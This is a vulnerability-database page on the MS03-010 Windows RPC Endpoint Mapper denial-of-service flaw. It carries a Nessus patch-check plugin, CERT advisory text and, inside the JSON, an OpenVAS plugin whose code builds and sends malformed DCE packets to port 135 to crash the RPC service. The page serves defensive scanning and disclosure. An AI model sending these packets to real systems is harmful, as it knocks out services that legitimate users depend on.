Search...

MS03-010: Flaw in RPC Endpoint Mapper Could Allow Denial of Service Attacks (331953)

2003-03-26T00:00:00

ID SMB_NT_MS03-010.NASL
Type nessus
Reporter This script is Copyright (C) 2003-2018 Tenable Network Security, Inc.
Modified 2021-01-02T00:00:00

Description

A flaw exists in the RPC endpoint mapper that can be used by an attacker to disable it remotely.

                                        
                                            #
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
 script_id(11485);
 script_version("1.46");
 script_cvs_date("Date: 2018/11/15 20:50:29");

 script_cve_id("CVE-2002-1561");
 script_bugtraq_id(6005);
 script_xref(name:"MSFT", value:"MS03-010");
 script_xref(name:"CERT", value:"261537");
 script_xref(name:"MSKB", value:"331953");

 script_name(english:"MS03-010: Flaw in RPC Endpoint Mapper Could Allow Denial of Service Attacks (331953)");
 script_summary(english:"Checks SP version");

 script_set_attribute(attribute:"synopsis", value:"It is possible to disable the remote RPC service.");
 script_set_attribute(attribute:"description", value:
"A flaw exists in the RPC endpoint mapper that can be used by an
attacker to disable it remotely.");
 script_set_attribute(attribute:"see_also", value:"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2003/ms03-010");
 script_set_attribute(attribute:"solution", value:"Microsoft has released a set of patches for the Windows 2000 and XP.");
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
 script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
 script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L");
 script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"true");

 script_set_attribute(attribute:"vuln_publication_date", value:"2002/10/18");
 script_set_attribute(attribute:"patch_publication_date", value:"2003/03/26");
 script_set_attribute(attribute:"plugin_publication_date", value:"2003/03/26");

 script_set_attribute(attribute:"plugin_type", value:"local");
 script_set_attribute(attribute:"cpe", value:"cpe:/o:microsoft:windows");
 script_end_attributes();

 script_category(ACT_GATHER_INFO);

 script_copyright(english:"This script is Copyright (C) 2003-2018 Tenable Network Security, Inc.");
 script_family(english:"Windows : Microsoft Bulletins");

 script_dependencies("smb_hotfixes.nasl", "ms_bulletin_checks_possible.nasl");
 script_require_keys("SMB/MS_Bulletin_Checks/Possible");
 script_require_ports(139, 445, 'Host/patch_management_checks');
 exit(0);
}

include("audit.inc");
include("smb_func.inc");
include("smb_hotfixes.inc");
include("smb_hotfixes_fcheck.inc");
include("misc_func.inc");

get_kb_item_or_exit("SMB/MS_Bulletin_Checks/Possible");

bulletin = 'MS03-010';
kb = "331953";

kbs = make_list(kb);
if (get_kb_item("Host/patch_management_checks")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_WARNING);

get_kb_item_or_exit("SMB/Registry/Enumerated");
get_kb_item_or_exit("SMB/WindowsVersion", exit_code:1);

if (hotfix_check_sp_range(nt:'6', win2k:'2,3', xp:'0,1') &lt;= 0) audit(AUDIT_OS_SP_NOT_VULN);

rootfile = hotfix_get_systemroot();
if (!rootfile) exit(1, "Failed to get the system root.");

share = hotfix_path2share(path:rootfile);
if (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);

if (
  hotfix_is_vulnerable(os:"5.1", sp:1, file:"Rpcrt4.dll", version:"5.1.2600.1140", dir:"\system32", bulletin:bulletin, kb:kb) ||
  hotfix_is_vulnerable(os:"5.1", sp:0, file:"Rpcrt4.dll", version:"5.1.2600.105",  dir:"\system32", bulletin:bulletin, kb:kb) ||
  hotfix_is_vulnerable(os:"5.0",       file:"Rpcrt4.dll", version:"5.0.2195.6106", dir:"\system32", bulletin:bulletin, kb:kb) ||
  hotfix_is_vulnerable(os:"4.0",       file:"Rpcrt4.dll", version:"5.0.0.0",       dir:"\system32", bulletin:bulletin, kb:kb)
)
{
  set_kb_item(name:"SMB/Missing/"+bulletin, value:TRUE);
  hotfix_security_warning();
  hotfix_check_fversion_end();
  exit(0);
}
else
{
  hotfix_check_fversion_end();
  audit(AUDIT_HOST_NOT, 'affected');
}

JSON Vulners Source

Initial Source

{"id": "SMB_NT_MS03-010.NASL", "bulletinFamily": "scanner", "title": "MS03-010: Flaw in RPC Endpoint Mapper Could Allow Denial of Service Attacks (331953)", "description": "A flaw exists in the RPC endpoint mapper that can be used by an\nattacker to disable it remotely.", "published": "2003-03-26T00:00:00", "modified": "2021-01-02T00:00:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "href": "https://www.tenable.com/plugins/nessus/11485", "reporter": "This script is Copyright (C) 2003-2018 Tenable Network Security, Inc.", "references": ["https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2003/ms03-010"], "cvelist": ["CVE-2002-1561"], "type": "nessus", "lastseen": "2021-01-01T05:43:21", "edition": 26, "viewCount": 25, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2002-1561"]}, {"type": "osvdb", "idList": ["OSVDB:13414"]}, {"type": "openvas", "idList": ["OPENVAS:136141256231011159"]}, {"type": "cert", "idList": ["VU:261537"]}, {"type": "exploitdb", "idList": ["EDB-ID:21954", "EDB-ID:21952", "EDB-ID:21953", "EDB-ID:21951"]}, {"type": "nessus", "idList": ["MSRPC-SPIKE27.NASL"]}], "modified": "2021-01-01T05:43:21", "rev": 2}, "score": {"value": 6.1, "vector": "NONE", "modified": "2021-01-01T05:43:21", "rev": 2}, "vulnersScore": 6.1}, "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(11485);\n script_version(\"1.46\");\n script_cvs_date(\"Date: 2018/11/15 20:50:29\");\n\n script_cve_id(\"CVE-2002-1561\");\n script_bugtraq_id(6005);\n script_xref(name:\"MSFT\", value:\"MS03-010\");\n script_xref(name:\"CERT\", value:\"261537\");\n script_xref(name:\"MSKB\", value:\"331953\");\n\n script_name(english:\"MS03-010: Flaw in RPC Endpoint Mapper Could Allow Denial of Service Attacks (331953)\");\n script_summary(english:\"Checks SP version\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"It is possible to disable the remote RPC service.\");\n script_set_attribute(attribute:\"description\", value:\n\"A flaw exists in the RPC endpoint mapper that can be used by an\nattacker to disable it remotely.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2003/ms03-010\");\n script_set_attribute(attribute:\"solution\", value:\"Microsoft has released a set of patches for the Windows 2000 and XP.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2002/10/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2003/03/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2003/03/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(english:\"This script is Copyright (C) 2003-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, 'Host/patch_management_checks');\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS03-010';\nkb = \"331953\";\n\nkbs = make_list(kb);\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_WARNING);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(nt:'6', win2k:'2,3', xp:'0,1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nrootfile = hotfix_get_systemroot();\nif (!rootfile) exit(1, \"Failed to get the system root.\");\n\nshare = hotfix_path2share(path:rootfile);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n hotfix_is_vulnerable(os:\"5.1\", sp:1, file:\"Rpcrt4.dll\", version:\"5.1.2600.1140\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.1\", sp:0, file:\"Rpcrt4.dll\", version:\"5.1.2600.105\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.0\", file:\"Rpcrt4.dll\", version:\"5.0.2195.6106\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"4.0\", file:\"Rpcrt4.dll\", version:\"5.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb)\n)\n{\n set_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_warning();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "naslFamily": "Windows : Microsoft Bulletins", "pluginID": "11485", "cpe": ["cpe:/o:microsoft:windows"], "scheme": null, "cvss3": {"score": 5.3, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"}}

{"cve": [{"lastseen": "2020-10-03T11:37:00", "description": "The RPC component in Windows 2000, Windows NT 4.0, and Windows XP allows remote attackers to cause a denial of service (disabled RPC service) via a malformed packet to the RPC Endpoint Mapper at TCP port 135, which triggers a null pointer dereference.", "edition": 3, "cvss3": {}, "published": "2003-04-02T05:00:00", "title": "CVE-2002-1561", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2002-1561"], "modified": "2019-04-30T14:27:00", "cpe": ["cpe:/o:microsoft:windows_2000:*", "cpe:/o:microsoft:windows_xp:*", "cpe:/o:microsoft:windows_2000_terminal_services:*", "cpe:/o:microsoft:windows_nt:4.0"], "id": "CVE-2002-1561", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1561", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_nt:4.0:sp2:enterprise_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:*:terminal_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp2:server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp3:enterprise_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_2000_terminal_services:*:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_2000_terminal_services:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp4:server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_2000:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp6:workstation:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp1:server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp6:terminal_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp3:server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_2000:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp6a:enterprise_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_xp:*:sp1:64-bit:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp1:terminal_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp6a:server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_2000_terminal_services:*:sp3:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp6a:terminal_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp1:workstation:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp4:workstation:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp6:enterprise_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp5:enterprise_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp1:enterprise_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp5:terminal_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_2000:*:sp3:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_2000_terminal_services:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp6:server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp4:terminal_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:*:server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_2000:*:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp4:enterprise_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_xp:*:gold:professional:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp5:workstation:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp2:terminal_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_xp:*:*:home:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp3:terminal_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:*:enterprise_server:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp3:workstation:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp6a:workstation:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:*:workstation:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_xp:*:*:64-bit:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp2:workstation:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_xp:*:sp1:home:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:4.0:sp5:server:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:20:09", "bulletinFamily": "software", "cvelist": ["CVE-2002-1561"], "edition": 1, "description": "# No description provided by the source\n\n## References:\nOVAL ID: 59\nMicrosoft Security Bulletin: MS03-010\nISS X-Force ID: 10400\n[CVE-2002-1561](https://vulners.com/cve/CVE-2002-1561)\nCERT VU: 261537\nBugtraq ID: 6005\n", "modified": "2002-10-18T00:00:00", "published": "2002-10-18T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:13414", "id": "OSVDB:13414", "title": "Microsoft Windows RPC Endpoint Manager Malformed Packet DoS", "type": "osvdb", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "openvas": [{"lastseen": "2019-05-29T18:31:58", "bulletinFamily": "scanner", "cvelist": ["CVE-2002-1561"], "description": "MS Windows RPC service (RPCSS) crashes trying to dereference a\n null pointer when it receives a certain malformed request.\n All MS RPC-based services (i.e. a large part of MS Windows 2000+)\n running on the target machine are rendered inoperable.", "modified": "2019-04-24T00:00:00", "published": "2005-11-03T00:00:00", "id": "OPENVAS:136141256231011159", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231011159", "type": "openvas", "title": "MS RPC Services null pointer reference DoS", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# MS RPC Services null pointer reference DoS\n#\n# Authors:\n# Pavel Kankovsky, DCIT s.r.o. <kan@dcit.cz>\n#\n# Copyright:\n# Copyright (C) 2002 Pavel Kankovsky\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.11159\");\n script_version(\"2019-04-24T07:26:10+0000\");\n script_tag(name:\"last_modification\", value:\"2019-04-24 07:26:10 +0000 (Wed, 24 Apr 2019)\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_cve_id(\"CVE-2002-1561\");\n script_xref(name:\"IAVA\", value:\"2003-t-0008\");\n script_bugtraq_id(6005);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"MS RPC Services null pointer reference DoS\");\n script_category(ACT_DESTRUCTIVE_ATTACK);\n script_copyright(\"This script is Copyright (C) 2002 Pavel Kankovsky\");\n script_family(\"Denial of Service\");\n script_dependencies(\"dcetest.nasl\");\n script_require_ports(\"Services/epmap\", 135);\n\n script_tag(name:\"solution\", value:\"Block access to TCP port 135.\");\n\n script_tag(name:\"summary\", value:\"MS Windows RPC service (RPCSS) crashes trying to dereference a\n null pointer when it receives a certain malformed request.\n All MS RPC-based services (i.e. a large part of MS Windows 2000+)\n running on the target machine are rendered inoperable.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n\n exit(0);\n}\n\ninclude(\"misc_func.inc\");\n\n# Prepare DCE BIND request\nfunction dce_bind() {\n\n # Service UUID:\n # B9E79E60-3D52-11CE-AAA1-00006901293F\n # (this is one of the services bound to port 135)\n sv_uuid = raw_string(\n 0x60, 0x9E, 0xE7, 0xB9, 0x52, 0x3D, 0xCE, 0x11,\n 0xAA, 0xA1, 0x00, 0x00, 0x69, 0x01, 0x29, 0x3F);\n # The version is incorrect \"for extra fun\" (should be 0.2)\n sv_vers = raw_string(0x02, 0x00, 0x02, 0x00);\n\n # Transfer syntar UUID:\n # 8A885D04-1CEB-11C9-9FE8-08002B104860\n ts_uuid = raw_string(\n 0x04, 0x5D, 0x88, 0x8A, 0xEB, 0x1C, 0xC9, 0x11,\n 0x9F, 0xE8, 0x08, 0x00, 0x2B, 0x10, 0x48, 0x60);\n ts_vers = raw_string(0x02, 0x00, 0x00, 0x00);\n\n # Request header\n req_hdr = raw_string(\n 0x05, 0x00, # version, minor version\n 0x0b, 0x03, # BINDPACKET, flags (1st+last frag)\n 0x10, 0x00, 0x00, 0x00, # data representation (LE, ASCII, IEEE fp)\n 0x48, 0x00, # fragment length (72)\n 0x00, 0x00, # auth length\n 0x02, 0x00, 0x00, 0x00, # call id\n 0xd0, 0x16, 0xd0, 0x16, # max xmit frag, max recv frag\n 0x00, 0x00, 0x00, 0x00, # assoc group\n 0x01, # num ctx items\n 0x00, 0x00, 0x00, # (padding)\n 0x00, 0x00, # p_cont_id\n 0x01, # n_transfer_syn\n 0x00); # (padding)\n\n return (string(req_hdr, sv_uuid, sv_vers, ts_uuid, ts_vers));\n}\n\n# Prepare evil DCE request I\nfunction attack_dce_req_1() {\n\n # Request header\n req_hdr = raw_string(\n 0x05, 0x00, # version, minor version\n 0x00, 0x01, # REQUESTPACKET, flags (1st frag)\n 0x10, 0x00, 0x00, 0x00, # data representation (LE, ASCII, IEEE fp)\n 0xd0, 0x16, # fragment length (5840)\n 0x00, 0x00, # auth length\n 0x8f, 0x00, 0x00, 0x00, # call id\n 0x20, 0x27, 0x01, 0x00, # alloc hint\n 0x00, 0x00, # context id\n 0x02, 0x00, # opnum: 0\n 0xf0, 0x00, 0x00, 0x00, # ?\n 0x00, 0x00, 0x00, 0x00, # ?\n 0x0f, 0x00, 0x00, 0x00); # ?\n\n req_dt1 = crap(data:raw_string(0x41), length:240);\n\n req_dt2 = raw_string(\n 0x88, 0x13, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x88, 0x13, 0x00, 0x00);\n\n req_dt3 = crap(data:raw_string(0x42), length:5000);\n\n req_dt4 = raw_string(\n 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00);\n\n req_dt5 = crap(data:raw_string(0x43), length:512);\n\n req_dt6 = raw_string(\n 0xfe, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0xfe, 0xff, 0x00, 0x00, 0x3d, 0x3d, 0x3d, 0x3d,\n 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d,\n 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d);\n\n return(string(req_hdr, req_dt1, req_dt2, req_dt3, req_dt4, req_dt5, req_dt6));\n}\n\n# Prepare evil DCE request II\n# the size does not match fragment length?!\nfunction attack_dce_req_2(ah, stuff) {\n\n # grrr...nasl barfs on (ah/xx) & 0xff\n ah0 = ah & 0xff;\n ah1 = ah / 256; ah1 = ah1 & 0xff;\n ah2 = ah / 65536; ah2 = ah2 & 0xff;\n ah3 = ah / 16777216; ah3 = ah3 & 0xff;\n\n # Request header\n req_hdr = raw_string(\n 0x05, 0x00, # version, minor version\n 0x00, 0x00, # REQUESTPACKET, flags (none)\n 0x10, 0x00, 0x00, 0x00, # data representation (LE, ASCII, IEEE fp)\n 0xd0, 0x16, # fragment length (5840...hmmm)\n 0x00, 0x00, # auth length\n 0x8f, 0x00, 0x00, 0x00, # call id\n ah0, ah1, ah2, ah3, # alloc hint\n 0x00, 0x00, # context id\n 0x02, 0x00); # opnum: ?\n\n req_dt1 = crap(data:raw_string(stuff), length:5000);\n\n return (string(req_hdr, req_dt1));\n}\n\n# Prepare evil DCE request III\n# this makes absolutely no sense, hmm...\n# the attack appears to work without it...\nfunction attack_dce_req_3() {\n\n # Request header? eh...sort of\n req_hdr = raw_string(\n 0x00, 0x00, 0x01, 0x10, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x01, 0x10, 0x00, 0x00);\n\n req_dt1 = crap(data:raw_string(0x48), length:5000);\n\n return (string(req_hdr, req_dt1));\n}\n\n# Carry out the attack.\nfunction attack(port) {\n\n soc = open_sock_tcp(port);\n if(!soc)\n return (1);\n\n # send bind request and check whether we got some reply\n # this is used as a liveness test\n send(socket:soc, data:dce_bind());\n r = recv(socket:soc, length:16);\n if(strlen(r) < 16)\n return (1);\n\n # send the evil packets\n send(socket:soc, data:attack_dce_req_1());\n send(socket:soc, data:attack_dce_req_2(ah:0x011050, stuff:0x44));\n send(socket:soc, data:attack_dce_req_2(ah:0xf980, stuff:0x45));\n send(socket:soc, data:attack_dce_req_2(ah:0xe2b0, stuff:0x46));\n send(socket:soc, data:attack_dce_req_2(ah:0x1560, stuff:0x47));\n send(socket:soc, data:attack_dce_req_3());\n\n close(soc);\n return (0);\n}\n\nport = get_port_for_service( default:135, proto:\"epmap\" );\n\nmaxtries = 5;\ncountdown = maxtries;\n\nwhile (countdown > 0) {\n success = attack(port:port);\n if (success) {\n if (countdown == maxtries) {\n # XXX it refuses to talk to us\n # XXX should we print a warning?\n exit(0);\n }\n security_message(port:port);\n exit(0);\n }\n countdown = countdown - 1;\n sleep(1);\n}\n\nexit(99);", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "cert": [{"lastseen": "2020-09-18T20:44:33", "bulletinFamily": "info", "cvelist": ["CVE-2002-1561"], "description": "### Overview \n\nThe RPC service in Microsoft Windows NT 4.0, 2000, and XP can be terminated by a specially crafted RPC message. A remote attacker could cause a denial of service.\n\n### Description \n\nAccording to Microsoft Security Bulletin [MS03-010](<http://www.microsoft.com/technet/security/bulletin/MS03-010.asp>), \"[Remote Procedure Call](<http://msdn.microsoft.com/library/default.asp?url=/library/en-us/rpc/rpc/how_rpc_works.asp>) (RPC) is a protocol used by the Windows operating system. RPC provides an inter-process communication mechanism that allows a program running on one computer to seamlessly execute code on a remote system.\"\n\nA vulnerability exists in a part of the RPC service called the RPC Endpoint Mapper. The RPC Endpoint Mapper listens for network requests (135/tcp), provides clients with port numbers for RPC services, and maintains information about RPC connections. According to a [report](<http://www.immunitysec.com/vulnerabilities/Immunity_svchost_DoS.txt>) from Immunity Security, vulnerable code in the RPC Endpoint Mapper dereferences a NULL pointer when processing a malformed RPC message. \n \n--- \n \n### Impact \n\nAn unauthenticated, remote attacker could cause the RPC Endpoint Mapper to terminate, denying service to legitimate users. Since the RPC Endpoint Mapper is part of the RPC service, \"...exploiting this vulnerability would cause the RPC service to fail, with the attendant loss of any RPC-based services the server offers, as well as potential loss of some COM functions.\" \nOnce the RPC service has been terminated, an attacker may be able to take control over an orphaned named pipe and gain the privileges of the RPC service (Local System). \n \n--- \n \n### Solution \n\n**Apply Patch** \nApply the appropriate patch (Q331953) as specified in [MS03-010](<http://www.microsoft.com/technet/security/bulletin/MS03-010.asp>). Microsoft notes that a patch will not be produced for Windows NT 4.0 or Windows NT 4.0 Terminal Server Edition. \nThe patches may cause local COM calls to fail, which could affect ASP/COM+ applications. See Microsoft Knowledgebase Article [814119](<http://support.microsoft.com/?kbid=814119>) for more information. \n \n--- \n \n \n**Block or Restrict Access** \n \nBlock or restrict access to the RPC Endpoint Mapper service (135/tcp) from untrusted networks such as the Internet. \n \n--- \n \n### Vendor Information\n\n261537\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Microsoft Corporation __ Affected\n\nUpdated: March 26, 2003 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see [MS03-010](<http://www.microsoft.com/technet/security/bulletin/MS03-010.asp>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23261537 Feedback>).\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References \n\n * <http://www.immunitysec.com/vulnerabilities/Immunity_svchost_DoS.txt>\n * <http://www.securityfocus.com/bid/6005>\n * <http://www.securityfocus.com/bid/6769>\n * <http://www.securityfocus.com/archive/1/296114>\n * <http://www.microsoft.com/technet/security/bulletin/MS03-010.asp>\n * <http://support.microsoft.com/default.aspx?scid=kb;en-us;331953>\n * <http://support.microsoft.com/?kbid=814119>\n * <http://msdn.microsoft.com/library/default.asp?url=/library/en-us/rpc/rpc/how_rpc_works.asp>\n\n### Acknowledgements\n\nThis vulnerability was publicly reported by Dave Aitel of Immunity Security.\n\nThis document was written by Art A Manion.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2002-1561](<http://web.nvd.nist.gov/vuln/detail/CVE-2002-1561>) \n---|--- \n**Severity Metric:** | 23.69 \n**Date Public:** | 2002-10-18 \n**Date First Published:** | 2003-03-26 \n**Date Last Updated: ** | 2003-06-04 18:13 UTC \n**Document Revision: ** | 22 \n", "modified": "2003-06-04T18:13:00", "published": "2003-03-26T00:00:00", "id": "VU:261537", "href": "https://www.kb.cert.org/vuls/id/261537", "type": "cert", "title": "Microsoft Windows RPC service vulnerable to DoS via NULL pointer dereference", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "exploitdb": [{"lastseen": "2016-02-02T17:38:12", "description": "Microsoft Windows XP/2000/NT 4 RPC Service Denial of Service Vulnerability (1). CVE-2002-1561. Dos exploit for windows platform", "published": "2002-10-22T00:00:00", "type": "exploitdb", "title": "Microsoft Windows XP/2000/NT 4 RPC Service Denial of Service Vulnerability 1", "bulletinFamily": "exploit", "cvelist": ["CVE-2002-1561"], "modified": "2002-10-22T00:00:00", "id": "EDB-ID:21951", "href": "https://www.exploit-db.com/exploits/21951/", "sourceData": "source: http://www.securityfocus.com/bid/6005/info\r\n\r\nThe Microsoft Windows RPC service contains a flaw that may allow a remote attacker to cause a denial 